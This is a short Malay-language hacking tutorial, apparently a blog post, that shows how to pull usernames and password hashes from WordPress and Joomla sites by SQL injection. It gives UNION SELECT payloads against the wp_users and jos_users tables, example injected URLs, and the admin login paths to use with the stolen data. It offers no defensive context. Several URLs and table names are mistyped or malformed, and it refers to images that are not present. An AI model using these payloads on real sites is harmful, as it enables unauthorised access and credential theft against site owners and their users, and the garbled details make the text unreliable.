Kenali Wordpress dan joomla Untuk Sqli Injection

Salam sejahtera

Hari ni seth nak kongsi satu benda berkenaan dengan SQli yang ada di wordpress dan Joomla .
Sebenarnya banyak lagi bug yang terdapat di server Wordpress dan Joomla ini.

Contohnya : Arbitrary file Uploads , File Upload Vulnerablities , http Header Bugs . Xss .
kalau korang nak tahu . korang google satu satu keyword dekat atas .

Ok .

1:Wordpress

Seth nak terangkan Database untuk wordpress dahulu .

(Gambar Di atas adalah Database website ber"platform" Wordpress)

Sekarang kita akan berfikir logik untuk mencari username jika mengunakan SQLI .

Wp_User : Username dan password Disimpan

Contoh adalah :

Http://[localhost]/index.php?/p?=2

pada perimeter "p?=2" terdedah kepada Sqli injection . maka masukan exploit wordpress .

union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--

Maka akan Menjadi :

Http://[localhost]/index.php?/p?=-2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_ass),7,8,9+from+wp_user--

Nanti akan keluar username dan password untuk website wordpress itu tadi .

Jangan Lupa tambah : "- dan + sebelum Exploit. Rujuk warna Merah Di atas .

Htpp://[localhost]/wp_admin/ - /wp_login.php : Halaman Admin


2:Joomla

Jom kita tengok database Joomla .
(Sila Rujuk Penerangan Di Atas untuk Jomla)


Jos_Users : Username dan password Disimpan .

Http://[localhost]/index.php?option=view=saya=2

Exploit :

+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--

Contoh:

Http://[localhost]/index.php?option=view=saya=-2+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4
,5,6,7,8,9,10+from+jos_users--

Http://[localhost]/administrator : Halaman Admin

itu sahaja .

Share ok .